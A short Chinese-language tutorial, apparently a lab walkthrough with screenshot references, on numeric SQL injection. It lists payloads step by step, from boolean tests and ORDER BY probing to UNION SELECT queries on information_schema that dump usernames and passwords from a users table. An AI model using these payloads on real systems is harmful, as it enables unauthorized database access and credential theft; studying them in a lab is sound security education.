数字型SQL注入实战

s1.png

判断是否存在注入点,注入类型是什么

and 1=1#正确  and 1=2#空白报错

使用order by进行排序查询

使用union select查询回显的个数及相应位置s2.png

使用union select 1,2,database()查询当前数据库名称s3.png

通过union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database()显示该数据库下的表

s4.png

通过union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users'显示users表下的字段

s5.png

使用union select 1,2,group_concat(username,0x3a,password) from users显示users表中的数据

0x3a为16进制的:将数据进行分割

至此SQL注入完成

s6.png